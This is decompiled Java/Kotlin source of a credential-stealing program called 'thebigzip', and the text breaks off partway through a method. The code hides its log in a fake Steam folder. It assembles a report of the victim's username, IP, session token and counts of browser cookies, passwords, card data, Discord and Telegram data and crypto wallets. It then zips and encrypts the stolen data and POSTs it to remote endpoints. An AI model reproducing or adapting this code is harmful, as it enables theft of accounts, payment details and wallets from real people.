/*
 * Decompiled with CFR 0.152.
 */
package com.synpase;

import com.synpase.Config;
import com.synpase.Skepta;
import com.synpase.Synpase;
import java.io.BufferedReader;
import java.io.Closeable;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.io.Reader;
import java.net.HttpURLConnection;
import java.net.URI;
import java.net.URL;
import java.net.URLConnection;
import java.nio.charset.Charset;
import java.security.Key;
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.time.Instant;
import java.time.LocalDateTime;
import java.time.format.DateTimeFormatter;
import java.util.Base64;
import java.util.Collection;
import java.util.Iterator;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Locale;
import java.util.Map;
import java.util.UUID;
import java.util.zip.ZipEntry;
import java.util.zip.ZipOutputStream;
import javax.crypto.Cipher;
import javax.crypto.spec.GCMParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import kotlin.ExceptionsKt;
import kotlin.Metadata;
import kotlin.Pair;
import kotlin.TuplesKt;
import kotlin.Unit;
import kotlin.collections.ArraysKt;
import kotlin.collections.CollectionsKt;
import kotlin.collections.MapsKt;
import kotlin.io.ByteStreamsKt;
import kotlin.io.CloseableKt;
import kotlin.io.FilesKt;
import kotlin.io.TextStreamsKt;
import kotlin.jvm.internal.Intrinsics;
import kotlin.jvm.internal.SourceDebugExtension;
import kotlin.ranges.RangesKt;
import kotlin.sequences.Sequence;
import kotlin.text.Charsets;
import kotlin.text.StringsKt;
import org.jetbrains.annotations.NotNull;

@Metadata(mv={2, 3, 0}, k=1, xi=48, d1={"\u0000L\n\u0002\u0018\u0002\n\u0002\u0010\u0000\n\u0002\b\u0002\n\u0002\u0010\u0002\n\u0000\n\u0002\u0010\u000e\n\u0002\b\u0003\n\u0002\u0018\u0002\n\u0002\u0018\u0002\n\u0000\n\u0002\u0010$\n\u0002\b\u0010\n\u0002\u0018\u0002\n\u0002\b\u0002\n\u0002\u0010\u000b\n\u0002\b\u000b\n\u0002\u0010\b\n\u0002\b\u001b\n\u0002\u0010\t\n\u0002\b\u0004\b\u00c6\u0002\u0018\u00002\u00020\u0001:\u0001LB\t\b\u0002\u00a2\u0006\u0004\b\u0002\u0010\u0003J\u000f\u0010\u0005\u001a\u00020\u0004H\u0002\u00a2\u0006\u0004\b\u0005\u0010\u0003J\u0017\u0010\b\u001a\u00020\u00042\u0006\u0010\u0007\u001a\u00020\u0006H\u0002\u00a2\u0006\u0004\b\b\u0010\tJA\u0010\u000f\u001a\u00020\u00042\u0006\u0010\u0007\u001a\u00020\u00062\u0010\b\u0002\u0010\f\u001a\n\u0018\u00010\nj\u0004\u0018\u0001`\u000b2\u0016\b\u0002\u0010\u000e\u001a\u0010\u0012\u0004\u0012\u00020\u0006\u0012\u0004\u0012\u00020\u0001\u0018\u00010\rH\u0002\u00a2\u0006\u0004\b\u000f\u0010\u0010J\u0017\u0010\u0011\u001a\u00020\u00042\u0006\u0010\u0007\u001a\u00020\u0006H\u0002\u00a2\u0006\u0004\b\u0011\u0010\tJ\u0017\u0010\u0012\u001a\u00020\u00042\u0006\u0010\u0007\u001a\u00020\u0006H\u0002\u00a2\u0006\u0004\b\u0012\u0010\tJ\u0017\u0010\u0013\u001a\u00020\u00042\u0006\u0010\u0007\u001a\u00020\u0006H\u0002\u00a2\u0006\u0004\b\u0013\u0010\tJ\u0017\u0010\u0014\u001a\u00020\u00042\u0006\u0010\u0007\u001a\u00020\u0006H\u0002\u00a2\u0006\u0004\b\u0014\u0010\tJ\u0017\u0010\u0016\u001a\u00020\u00062\u0006\u0010\u0015\u001a\u00020\u0006H\u0002\u00a2\u0006\u0004\b\u0016\u0010\u0017JO\u0010\u001c\u001a\u00020\u00042\u0006\u0010\u0018\u001a\u00020\u00062\n\b\u0002\u0010\u0019\u001a\u0004\u0018\u00010\u00062\b\b\u0002\u0010\u001a\u001a\u00020\u00062\b\b\u0002\u0010\u001b\u001a\u00020\u00062\u0016\b\u0002\u0010\u000e\u001a\u0010\u0012\u0004\u0012\u00020\u0006\u0012\u0004\u0012\u00020\u0001\u0018\u00010\rH\u0002\u00a2\u0006\u0004\b\u001c\u0010\u001dJ\u001f\u0010\"\u001a\u00020!2\u0006\u0010\u001f\u001a\u00020\u001e2\u0006\u0010 \u001a\u00020\u001eH\u0002\u00a2\u0006\u0004\b\"\u0010#Jk\u0010/\u001a\u00020\u00062\u0006\u0010$\u001a\u00020\u00062\u0006\u0010%\u001a\u00020\u00062\u0006\u0010&\u001a\u00020\u00062\u0006\u0010'\u001a\u00020\u00062\u0006\u0010(\u001a\u00020\u00062\u0006\u0010)\u001a\u00020\u00062\u0006\u0010*\u001a\u00020\u00062\u0006\u0010+\u001a\u00020\u00062\u0006\u0010,\u001a\u00020\u00062\u0012\u0010.\u001a\u000e\u0012\u0004\u0012\u00020\u0006\u0012\u0004\u0012\u00020-0\rH\u0002\u00a2\u0006\u0004\b/\u00100J\u0017\u00102\u001a\u00020\u00062\u0006\u00101\u001a\u00020\u0006H\u0002\u00a2\u0006\u0004\b2\u0010\u0017J\u001f\u00104\u001a\u00020!2\u0006\u00103\u001a\u00020\u00062\u0006\u0010 \u001a\u00020\u001eH\u0002\u00a2\u0006\u0004\b4\u00105J#\u00107\u001a\u000e\u0012\u0004\u0012\u00020\u0006\u0012\u0004\u0012\u00020-0\r2\u0006\u00106\u001a\u00020\u001eH\u0002\u00a2\u0006\u0004\b7\u00108J]\u00109\u001a\u00020\u00042\b\b\u0002\u0010$\u001a\u00020\u00062\b\b\u0002\u0010%\u001a\u00020\u00062\b\b\u0002\u0010&\u001a\u00020\u00062\b\b\u0002\u0010'\u001a\u00020\u00062\b\b\u0002\u0010(\u001a\u00020\u00062\b\b\u0002\u0010)\u001a\u00020\u00062\b\b\u0002\u0010*\u001a\u00020\u00062\b\b\u0002\u0010,\u001a\u00020\u0006\u00a2\u0006\u0004\b9\u0010:J\r\u0010;\u001a\u00020\u0004\u00a2\u0006\u0004\b;\u0010\u0003R\u0014\u0010<\u001a\u00020\u00068\u0002X\u0082\u0004\u00a2\u0006\u0006\n\u0004\b<\u0010=R\u0014\u0010>\u001a\u00020\u00068\u0002X\u0082\u0004\u00a2\u0006\u0006\n\u0004\b>\u0010=R\u0014\u0010?\u001a\u00020\u00068\u0002X\u0082\u0004\u00a2\u0006\u0006\n\u0004\b?\u0010=R\u0014\u0010@\u001a\u00020\u00068\u0002X\u0082\u0004\u00a2\u0006\u0006\n\u0004\b@\u0010=R\u0014\u0010A\u001a\u00020\u00068\u0002X\u0082\u0004\u00a2\u0006\u0006\n\u0004\bA\u0010=R\u0014\u0010B\u001a\u00020\u00068\u0002X\u0082\u0004\u00a2\u0006\u0006\n\u0004\bB\u0010=R\u0014\u0010C\u001a\u00020\u00068\u0002X\u0082\u0004\u00a2\u0006\u0006\n\u0004\bC\u0010=R\u0014\u0010D\u001a\u00020\u00068\u0002X\u0082\u0004\u00a2\u0006\u0006\n\u0004\bD\u0010=R\u0016\u0010E\u001a\u00020\u001e8\u0002@\u0002X\u0082.\u00a2\u0006\u0006\n\u0004\bE\u0010FR\u0016\u0010G\u001a\u00020!8\u0002@\u0002X\u0082\u000e\u00a2\u0006\u0006\n\u0004\bG\u0010HR\u0016\u0010J\u001a\u00020I8\u0002@\u0002X\u0082\u000e\u00a2\u0006\u0006\n\u0004\bJ\u0010K\u00a8\u0006M"}, d2={"Lcom/synpase/thebigzip;", "", "<init>", "()V", "", "setupLogging", "", "message", "log", "(Ljava/lang/String;)V", "Ljava/lang/Exception;", "Lkotlin/Exception;", "error", "", "context", "logError", "(Ljava/lang/String;Ljava/lang/Exception;Ljava/util/Map;)V", "logWarning", "logSuccess", "logProgress", "logDebug", "data", "encryptData", "(Ljava/lang/String;)Ljava/lang/String;", "errorMsg", "tracebackStr", "encryptionType", "componentName", "sendErrorToEndpoint", "(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/util/Map;)V", "Ljava/io/File;", "sourceDir", "zipFile", "", "createZipFile", "(Ljava/io/File;Ljava/io/File;)Z", "username", "desktopName", "useruuid", "uuid", "ip", "javaVersion", "osName", "zipBase64", "ssidToken", "", "stats", "createLogPayload", "(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/util/Map;)Ljava/lang/String;", "input", "escapeJson", "payload", "sendLogToEndpoint", "(Ljava/lang/String;Ljava/io/File;)Z", "browserDataDir", "scanBrowserDataDirectory", "(Ljava/io/File;)Ljava/util/Map;", "execute", "(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)V", "test", "SERVER_URL", "Ljava/lang/String;", "LOG_ENDPOINT", "ABE_ENDPOINT", "DPAPI_ENDPOINT", "ERROR_ENDPOINT", "SECRET", "OHMYGAHUUID", "USER_NAME", "logFile", "Ljava/io/File;", "loggingInitialized", "Z", "", "sessionStartTime", "J", "JSON", "synpase"})
@SourceDebugExtension(value={"SMAP\nthebigzip.kt\nKotlin\n*S Kotlin\n*F\n+ 1 thebigzip.kt\ncom/synpase/thebigzip\n+ 2 fake.kt\nkotlin/jvm/internal/FakeKt\n+ 3 _Sequences.kt\nkotlin/sequences/SequencesKt___SequencesKt\n+ 4 _Arrays.kt\nkotlin/collections/ArraysKt___ArraysKt\n+ 5 _Maps.kt\nkotlin/collections/MapsKt___MapsKt\n+ 6 _Collections.kt\nkotlin/collections/CollectionsKt___CollectionsKt\n*L\n1#1,720:1\n1#2:721\n1342#3,2:722\n14060#4:724\n14060#4,2:725\n14061#4:727\n14060#4:733\n14060#4,2:734\n14061#4:736\n221#5,2:728\n221#5,2:737\n1786#6,3:730\n*S KotlinDebug\n*F\n+ 1 thebigzip.kt\ncom/synpase/thebigzip\n*L\n249#1:722,2\n447#1:724\n451#1:725,2\n447#1:727\n669#1:733\n672#1:734,2\n669#1:736\n555#1:728,2\n681#1:737,2\n558#1:730,3\n*E\n"})
public final class thebigzip {
    @NotNull
    public static final thebigzip INSTANCE = new thebigzip();
    @NotNull
    private static final String SERVER_URL = Config.INSTANCE.getHttpBaseUrl();
    @NotNull
    private static final String LOG_ENDPOINT = Config.INSTANCE.getSendLogUrl();
    @NotNull
    private static final String ABE_ENDPOINT = Config.INSTANCE.getSendErrorAbeUrl();
    @NotNull
    private static final String DPAPI_ENDPOINT = Config.INSTANCE.getSendErrorDpapiUrl();
    @NotNull
    private static final String ERROR_ENDPOINT = Config.INSTANCE.getSendErrorUrl();
    @NotNull
    private static final String SECRET = Config.INSTANCE.getServerSecret();
    @NotNull
    private static final String OHMYGAHUUID = Config.INSTANCE.getUserId();
    @NotNull
    private static final String USER_NAME = Config.INSTANCE.getUserName();
    private static File logFile;
    private static boolean loggingInitialized;
    private static long sessionStartTime;

    private thebigzip() {
    }

    private final void setupLogging() {
        if (loggingInitialized) {
            return;
        }
        loggingInitialized = true;
        sessionStartTime = System.currentTimeMillis();
        String string = System.getenv("USERPROFILE");
        if (string == null) {
            string = "C:\\Users\\Default";
        }
        String userProfile = string;
        File logDir = new File(userProfile, "AppData\\LocalLow\\Temp\\Steam\\Ui.012");
        try {
            File file;
            if (!logDir.exists()) {
                logDir.mkdirs();
            }
            if ((file = (logFile = new File(logDir, "log.txt"))) == null) {
                Intrinsics.throwUninitializedPropertyAccessException((String)"logFile");
                file = null;
            }
            if (!file.exists()) {
                File file2 = logFile;
                if (file2 == null) {
                    Intrinsics.throwUninitializedPropertyAccessException((String)"logFile");
                    file2 = null;
                }
                file2.createNewFile();
            }
            this.log("\n" + StringsKt.repeat((CharSequence)"=", (int)80));
            this.log("=== THEBIGZIP SESSION STARTED ===");
            this.log("=== Started at: " + Instant.now() + " ===");
            this.log(StringsKt.repeat((CharSequence)"=", (int)80));
        }
        catch (Exception e) {
            File fallbackDir = new File(System.getProperty("java.io.tmpdir"), "thebigzip_logs");
            fallbackDir.mkdirs();
            logFile = new File(fallbackDir, "thebigzip_log.txt");
            File file = logFile;
            if (file == null) {
                Intrinsics.throwUninitializedPropertyAccessException((String)"logFile");
                file = null;
            }
            file.createNewFile();
        }
    }

    private final void log(String message) {
        try {
            if (logFile == null) {
                this.setupLogging();
            }
            String timestamp = LocalDateTime.now().format(DateTimeFormatter.ofPattern("yyyy-MM-dd HH:mm:ss.SSS"));
            String threadName = Thread.currentThread().getName();
            File file = logFile;
            if (file == null) {
                Intrinsics.throwUninitializedPropertyAccessException((String)"logFile");
                file = null;
            }
            FilesKt.appendText$default((File)file, (String)("[" + timestamp + "] [" + threadName + "] " + message + "\n"), null, (int)2, null);
            System.out.println((Object)("[THEBIGZIP] " + message));
        }
        catch (Exception e) {
            System.err.println("Failed to write to log: " + e.getMessage());
        }
    }

    private final void logError(String message, Exception error, Map<String, ? extends Object> context) {
        block0: {
            this.log("ERROR: " + message);
            Exception exception = error;
            if (exception == null) break block0;
            Exception it = exception;
            boolean bl = false;
            INSTANCE.log("   Exception: " + it.getClass().getSimpleName() + ": " + it.getMessage());
            INSTANCE.log("   Stack trace: " + StringsKt.take((String)ExceptionsKt.stackTraceToString((Throwable)it), (int)500) + "...");
            INSTANCE.sendErrorToEndpoint(message, ExceptionsKt.stackTraceToString((Throwable)it), "dpapi", "TheBigZip", context);
        }
    }

    static /* synthetic */ void logError$default(thebigzip thebigzip2, String string, Exception exception, Map map, int n, Object object) {
        if ((n & 2) != 0) {
            exception = null;
        }
        if ((n & 4) != 0) {
            map = null;
        }
        thebigzip2.logError(string, exception, map);
    }

    private final void logWarning(String message) {
        this.log("WARNING: " + message);
    }

    private final void logSuccess(String message) {
        this.log("SUCCESS: " + message);
    }

    private final void logProgress(String message) {
        this.log(">> " + message);
    }

    private final void logDebug(String message) {
        if (Intrinsics.areEqual((Object)System.getProperty("thebigzip.debug"), (Object)"true")) {
            this.log("DEBUG: " + message);
        }
    }

    private final String encryptData(String data) {
        try {
            MessageDigest messageDigest = MessageDigest.getInstance("SHA-256");
            byte[] byArray = SECRET.getBytes(Charsets.UTF_8);
            Intrinsics.checkNotNullExpressionValue((Object)byArray, (String)"getBytes(...)");
            byte[] keyBytes = messageDigest.digest(byArray);
            SecretKeySpec keySpec = new SecretKeySpec(keyBytes, "AES");
            byte[] iv = new byte[12];
            new SecureRandom().nextBytes(iv);
            Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
            GCMParameterSpec gcmSpec = new GCMParameterSpec(128, iv);
            cipher.init(1, (Key)keySpec, gcmSpec);
            byte[] byArray2 = data.getBytes(Charsets.UTF_8);
            Intrinsics.checkNotNullExpressionValue((Object)byArray2, (String)"getBytes(...)");
            byte[] ciphertextWithTag = cipher.doFinal(byArray2);
            Intrinsics.checkNotNull((Object)ciphertextWithTag);
            byte[] tag = ArraysKt.copyOfRange((byte[])ciphertextWithTag, (int)(ciphertextWithTag.length - 16), (int)ciphertextWithTag.length);
            byte[] ciphertext = ArraysKt.copyOfRange((byte[])ciphertextWithTag, (int)0, (int)(ciphertextWithTag.length - 16));
            byte[] result = new byte[iv.length + tag.length + ciphertext.length];
            System.arraycopy(iv, 0, result, 0, iv.length);
            System.arraycopy(tag, 0, result, iv.length, tag.length);
            System.arraycopy(ciphertext, 0, result, iv.length + tag.length, ciphertext.length);
            String string = Base64.getEncoder().encodeToString(result);
            Intrinsics.checkNotNullExpressionValue((Object)string, (String)"encodeToString(...)");
            return string;
        }
        catch (Exception e) {
            thebigzip.logError$default(this, "Encryption failed", e, null, 4, null);
            throw e;
        }
    }

    /*
     * WARNING - Removed try catching itself - possible behaviour change.
     * Enabled aggressive block sorting
     * Enabled unnecessary exception pruning
     * Enabled aggressive exception aggregation
     */
    private final void sendErrorToEndpoint(String errorMsg, String tracebackStr, String encryptionType, String componentName, Map<String, ? extends Object> context) {
        int attempts = 0;
        int maxAttempts = 3;
        while (true) {
            if (attempts >= maxAttempts) {
                thebigzip.logError$default(this, "Failed to send error to endpoint after " + maxAttempts + " attempts: " + errorMsg, null, null, 6, null);
                return;
            }
            HttpURLConnection connection = null;
            try {
                Object object;
                int responseCode;
                block41: {
                    block40: {
                        String string;
                        String string2;
                        String string3;
                        String endpoint;
                        ++attempts;
                        Intrinsics.checkNotNullExpressionValue((Object)encryptionType.toLowerCase(Locale.ROOT), (String)"toLowerCase(...)");
                        String string4 = endpoint = Intrinsics.areEqual((Object)string3, (Object)"abe") ? ABE_ENDPOINT : (Intrinsics.areEqual((Object)string3, (Object)"dpapi") ? DPAPI_ENDPOINT : ERROR_ENDPOINT);
                        Map map = context;
                        if (map == null || (map = MapsKt.toMutableMap((Map)map)) == null) {
                            map = new LinkedHashMap();
                        }
                        Map enhancedContext = map;
                        enhancedContext.put("attempt", attempts);
                        enhancedContext.put("session_time_ms", System.currentTimeMillis() - sessionStartTime);
                        Map map2 = enhancedContext;
                        Pair[] pairArray = "log_file";
                        if (logFile != null) {
                            File file = logFile;
                            if (file == null) {
                                Intrinsics.throwUninitializedPropertyAccessException((String)"logFile");
                                file = null;
                            }
                            string2 = file.getAbsolutePath();
                        } else {
                            string2 = "unknown";
                        }
                        String string5 = string2;
                        map2.put(pairArray, string5);
                        enhancedContext.put("component", componentName);
                        enhancedContext.put("encryption_type", encryptionType);
                        pairArray = new Pair[8];
                        pairArray[0] = TuplesKt.to((Object)"ohmygahuuid", (Object)OHMYGAHUUID);
                        pairArray[1] = TuplesKt.to((Object)"message", (Object)errorMsg);
                        String string6 = tracebackStr;
                        if (string6 == null) {
                            string6 = "";
                        }
                        pairArray[2] = TuplesKt.to((Object)"stack", (Object)string6);
                        pairArray[3] = TuplesKt.to((Object)"level", (Object)"error");
                        pairArray[4] = TuplesKt.to((Object)"context", (Object)enhancedContext);
                        pairArray[5] = TuplesKt.to((Object)"clientName", (Object)componentName);
                        pairArray[6] = TuplesKt.to((Object)"clientId", null);
                        pairArray[7] = TuplesKt.to((Object)"transport", (Object)"http_fallback");
                        Map errorPayload = MapsKt.mapOf((Pair[])pairArray);
                        String jsonString = JSON.INSTANCE.stringify(errorPayload);
                        String encrypted = this.encryptData(jsonString);
                        String finalPayload = "{\"data\":\"" + encrypted + "\"}";
                        this.logProgress("Sending error to " + endpoint + " (attempt " + attempts + "/" + maxAttempts + ")");
                        this.logDebug("Error payload: " + errorMsg);
                        URL url = new URL(endpoint);
                        URLConnection uRLConnection = url.openConnection();
                        Intrinsics.checkNotNull((Object)uRLConnection, (String)"null cannot be cast to non-null type java.net.HttpURLConnection");
                        connection = (HttpURLConnection)uRLConnection;
                        connection.setRequestMethod("POST");
                        connection.setRequestProperty("Content-Type", "application/json");
                        connection.setRequestProperty("User-Agent", "TheBigZip/1.0");
                        connection.setDoOutput(true);
                        connection.setConnectTimeout(5000);
                        connection.setReadTimeout(5000);
                        Closeable closeable = connection.getOutputStream();
                        Throwable throwable = null;
                        try {
                            OutputStream os = (OutputStream)closeable;
                            boolean bl = false;
                            byte[] byArray = finalPayload.getBytes(Charsets.UTF_8);
                            Intrinsics.checkNotNullExpressionValue((Object)byArray, (String)"getBytes(...)");
                            os.write(byArray);
                            os.flush();
                            Unit unit = Unit.INSTANCE;
                        }
                        catch (Throwable throwable2) {
                            throwable = throwable2;
                            throw throwable2;
                        }
                        finally {
                            CloseableKt.closeFinally((Closeable)closeable, (Throwable)throwable);
                        }
                        responseCode = connection.getResponseCode();
                        if (responseCode == 200) {
                            this.logDebug("Error reported successfully to " + endpoint);
                            try {
                                connection.disconnect();
                                return;
                            }
                            catch (Exception exception) {
                                // empty catch block
                            }
                            return;
                        }
                        object = connection.getErrorStream();
                        if (object == null) break block40;
                        InputStream inputStream = object;
                        Object object2 = Charsets.UTF_8;
                        Object object3 = new InputStreamReader(inputStream, (Charset)object2);
                        int n = 8192;
                        object2 = object3 instanceof BufferedReader ? (BufferedReader)object3 : new BufferedReader((Reader)object3, n);
                        object3 = null;
                        try {
                            BufferedReader it = (BufferedReader)object2;
                            boolean bl = false;
                            String string7 = TextStreamsKt.readText((Reader)it);
                            string = string7;
                        }
                        catch (Throwable throwable3) {
                            object3 = throwable3;
                            throw throwable3;
                        }
                        finally {
                            CloseableKt.closeFinally((Closeable)object2, (Throwable)object3);
                        }
                        object = string;
                        if (string != null) break block41;
                    }
                    object = "";
                }
                Object errorResponse = object;
                this.logWarning("Error endpoint returned " + responseCode + ", attempt " + attempts + "/" + maxAttempts);
                this.logDebug("Response: " + (String)errorResponse);
                if (attempts < maxAttempts) {
                    Thread.sleep(1000 * attempts);
                }
                try {
                    connection.disconnect();
                }
                catch (Exception enhancedContext) {}
                continue;
            }
            catch (Exception e) {
                this.logDebug("Failed to send error (attempt " + attempts + "): " + e.getMessage());
                if (attempts >= maxAttempts) continue;
                try {
                    Thread.sleep(1000 * attempts);
                }
                catch (InterruptedException ie) {
                    Thread.currentThread().interrupt();
                }
                continue;
            }
            finally {
                try {
                    HttpURLConnection httpURLConnection = connection;
                    if (httpURLConnection == null) continue;
                    httpURLConnection.disconnect();
                }
                catch (Exception exception) {}
                continue;
            }
            break;
        }
    }

    static /* synthetic */ void sendErrorToEndpoint$default(thebigzip thebigzip2, String string, String string2, String string3, String string4, Map map, int n, Object object) {
        if ((n & 2) != 0) {
            string2 = null;
        }
        if ((n & 4) != 0) {
            string3 = "dpapi";
        }
        if ((n & 8) != 0) {
            string4 = "TheBigZip";
        }
        if ((n & 0x10) != 0) {
            map = null;
        }
        thebigzip2.sendErrorToEndpoint(string, string2, string3, string4, map);
    }

    /*
     * WARNING - Removed try catching itself - possible behaviour change.
     */
    private final boolean createZipFile(File sourceDir, File zipFile) {
        boolean bl;
        try {
            this.logProgress("Creating zip file: " + zipFile.getAbsolutePath());
            long startTime = System.currentTimeMillis();
            if (!sourceDir.exists()) {
                thebigzip.logError$default(this, "Source directory does not exist: " + sourceDir.getAbsolutePath(), null, null, 6, null);
                return false;
            }
            Closeable closeable = new ZipOutputStream(new FileOutputStream(zipFile));
            Throwable throwable = null;
            try {
                ZipOutputStream zos = (ZipOutputStream)closeable;
                boolean bl2 = false;
                int fileCount = 0;
                Sequence $this$forEach$iv = (Sequence)FilesKt.walkTopDown((File)sourceDir);
                boolean $i$f$forEach = false;
                for (Object element$iv : $this$forEach$iv) {
                    File file = (File)element$iv;
                    boolean bl3 = false;
                    if (!file.isFile()) continue;
                    String relativePath = sourceDir.toURI().relativize(file.toURI()).getPath();
                    ZipEntry entry = new ZipEntry(relativePath);
                    zos.putNextEntry(entry);
                    Closeable closeable2 = new FileInputStream(file);
                    Throwable throwable2 = null;
                    try {
                        FileInputStream fis = (FileInputStream)closeable2;
                        boolean bl4 = false;
                        long l = ByteStreamsKt.copyTo$default((InputStream)fis, (OutputStream)zos, (int)0, (int)2, null);
                    }
                    catch (Throwable throwable3) {
                        throwable2 = throwable3;
                        throw throwable3;
                    }
                    finally {
                        CloseableKt.closeFinally((Closeable)closeable2, (Throwable)throwable2);
                    }
                    zos.closeEntry();
                    ++fileCount;
                    INSTANCE.logDebug("Added to zip: " + relativePath + " (" + file.length() + " bytes)");
                }
                INSTANCE.logDebug("Total files zipped: " + fileCount);
                Unit unit = Unit.INSTANCE;
            }
            catch (Throwable throwable4) {
                throwable = throwable4;
                throw throwable4;
            }
            finally {
                CloseableKt.closeFinally((Closeable)closeable, (Throwable)throwable);
            }
            long duration = System.currentTimeMillis() - startTime;
            this.logSuccess("Zip created successfully: " + zipFile.length() + " bytes in " + duration + "ms");
            bl = true;
        }
        catch (Exception e) {
            this.logError("Failed to create zip file", e, MapsKt.mapOf((Pair)TuplesKt.to((Object)"sourceDir", (Object)sourceDir.getPath())));
            bl = false;
        }
        return bl;
    }

    private final String createLogPayload(String username, String desktopName, String useruuid, String uuid, String ip, String javaVersion, String osName, String zipBase64, String ssidToken, Map<String, Integer> stats) {
        StringBuilder stringBuilder;
        StringBuilder $this$createLogPayload_u24lambda_u240 = stringBuilder = new StringBuilder();
        boolean bl = false;
        $this$createLogPayload_u24lambda_u240.append(username + "@" + desktopName).append('\n');
        $this$createLogPayload_u24lambda_u240.append("ohmygahuuid " + OHMYGAHUUID).append('\n');
        $this$createLogPayload_u24lambda_u240.append("useruuid " + useruuid).append('\n');
        $this$createLogPayload_u24lambda_u240.append("User " + username).append('\n');
        $this$createLogPayload_u24lambda_u240.append("UUID " + uuid).append('\n');
        $this$createLogPayload_u24lambda_u240.append("IP " + ip).append('\n');
        $this$createLogPayload_u24lambda_u240.append("Java version " + javaVersion).append('\n');
        $this$createLogPayload_u24lambda_u240.append("OS " + osName).append('\n');
        $this$createLogPayload_u24lambda_u240.append("SSID " + ssidToken).append('\n');
        $this$createLogPayload_u24lambda_u240.append("Browsers Chrome,Edge,Firefox,Opera").append('\n');
        StringBuilder stringBuilder2 = $this$createLogPayload_u24lambda_u240;
        Integer n = stats.get("cookies");
        stringBuilder2.append("Cookies " + (n != null ? n : 0)).append('\n');
        stringBuilder2 = $this$createLogPayload_u24lambda_u240;
        Integer n2 = stats.get("passwords");
        stringBuilder2.append("Passwords " + (n2 != null ? n2 : 0)).append('\n');
        stringBuilder2 = $this$createLogPayload_u24lambda_u240;
        Integer n3 = stats.get("autofills");
        stringBuilder2.append("Autofills " + (n3 != null ? n3 : 0)).append('\n');
        stringBuilder2 = $this$createLogPayload_u24lambda_u240;
        Integer n4 = stats.get("cards");
        stringBuilder2.append("Cards " + (n4 != null ? n4 : 0)).append('\n');
        stringBuilder2 = $this$createLogPayload_u24lambda_u240;
        Integer n5 = stats.get("history");
        stringBuilder2.append("History " + (n5 != null ? n5 : 0)).append('\n');
        stringBuilder2 = $this$createLogPayload_u24lambda_u240;
        Integer n6 = stats.get("discord");
        stringBuilder2.append("Discord " + (n6 != null ? n6 : 0)).append('\n');
        stringBuilder2 = $this$createLogPayload_u24lambda_u240;
        Integer n7 = stats.get("games");
        stringBuilder2.append("Games " + (n7 != null ? n7 : 0)).append('\n');
        stringBuilder2 = $this$createLogPayload_u24lambda_u240;
        Integer n8 = stats.get("telegram");
        stringBuilder2.append("Telegram " + (n8 != null ? n8 : 0)).append('\n');
        stringBuilder2 = $this$createLogPayload_u24lambda_u240;
        Integer n9 = stats.get("minecraft");
        stringBuilder2.append("Minecraft files " + (n9 != null ? n9 : 0)).append('\n');
        stringBuilder2 = $this$createLogPayload_u24lambda_u240;
        Integer n10 = stats.get("wallets");
        stringBuilder2.append("Wallets " + (n10 != null ? n10 : 0)).append('\n');
        $this$createLogPayload_u24lambda_u240.append("-----BEGIN ZIP-----").append('\n');
        $this$createLogPayload_u24lambda_u240.append(zipBase64);
        $this$createLogPayload_u24lambda_u240.append('\n');
        $this$createLogPayload_u24lambda_u240.append("-----END ZIP-----").append('\n');
        return ((Object)StringsKt.trim((CharSequence)stringBuilder.toString())).toString();
    }

    private final String escapeJson(String input) {
        return StringsKt.replace$default((String)StringsKt.replace$default((String)StringsKt.replace$default((String)StringsKt.replace$default((String)StringsKt.replace$default((String)input, (String)"\\", (String)"\\\\", (boolean)false, (int)4, null), (String)"\"", (String)"\\\"", (boolean)false, (int)4, null), (String)"\n", (String)"\\n", (boolean)false, (int)4, null), (String)"\r", (String)"\\r", (boolean)false, (int)4, null), (String)"\t", (String)"\\t", (boolean)false, (int)4, null);
    }

    /*
     * WARNING - Removed try catching itself - possible behaviour change.
     * Loose catch block
     */
    private final boolean sendLogToEndpoint(String payload, File zipFile) {
        int attempts = 0;
        int maxAttempts = 3;
        HttpURLConnection connection = null;
        while (attempts < maxAttempts) {
            block45: {
                Object responseBody;
                String responseMessage;
                int responseCode;
                block44: {
                    boolean bl2222222222;
                    block47: {
                        Object object;
                        block46: {
                            String string;
                            Object object2;
                            this.logProgress("Sending log to endpoint (attempt " + ++attempts + "/" + maxAttempts + ")");
                            this.logDebug("Raw payload preview:\n" + StringsKt.take((String)payload, (int)500) + "...");
                            String jsonWrappedPayload = "\"" + this.escapeJson(payload) + "\"";
                            String encrypted = this.encryptData(jsonWrappedPayload);
                            String finalPayload = "{\"data\":\"" + encrypted + "\"}";
                            this.logDebug("Encrypted payload size: " + encrypted.length() + " chars");
                            this.logDebug("Final payload size: " + finalPayload.length() + " chars");
                            URL url = new URI(LOG_ENDPOINT).toURL();
                            URLConnection uRLConnection = url.openConnection();
                            Intrinsics.checkNotNull((Object)uRLConnection, (String)"null cannot be cast to non-null type java.net.HttpURLConnection");
                            connection = (HttpURLConnection)uRLConnection;
                            connection.setRequestMethod("POST");
                            connection.setRequestProperty("Content-Type", "application/json");
                            connection.setRequestProperty("User-Agent", "TheBigZip/1.0");
                            connection.setDoOutput(true);
                            connection.setConnectTimeout(30000);
                            connection.setReadTimeout(60000);
                            Closeable closeable = connection.getOutputStream();
                            Throwable throwable = null;
                            try {
                                OutputStream os = (OutputStream)closeable;
                                bl2222222222 = false;
                                byte[] byArray = finalPayload.getBytes(Charsets.UTF_8);
                                Intrinsics.checkNotNullExpressionValue((Object)byArray, (String)"getBytes(...)");
                                os.write(byArray);
                                os.flush();
                                os = Unit.INSTANCE;
                            }
                            catch (Throwable bl2222222222) {
                                throwable = bl2222222222;
                                throw bl2222222222;
                            }
                            finally {
                                CloseableKt.closeFinally((Closeable)closeable, (Throwable)throwable);
                            }
                            responseCode = connection.getResponseCode();
                            responseMessage = connection.getResponseMessage();
                            boolean bl3 = 200 <= responseCode ? responseCode < 300 : false;
                            if (bl3) {
                                InputStream inputStream = connection.getInputStream();
                                Intrinsics.checkNotNullExpressionValue((Object)inputStream, (String)"getInputStream(...)");
                                Closeable bl2222222222 = inputStream;
                                Object object3 = Charsets.UTF_8;
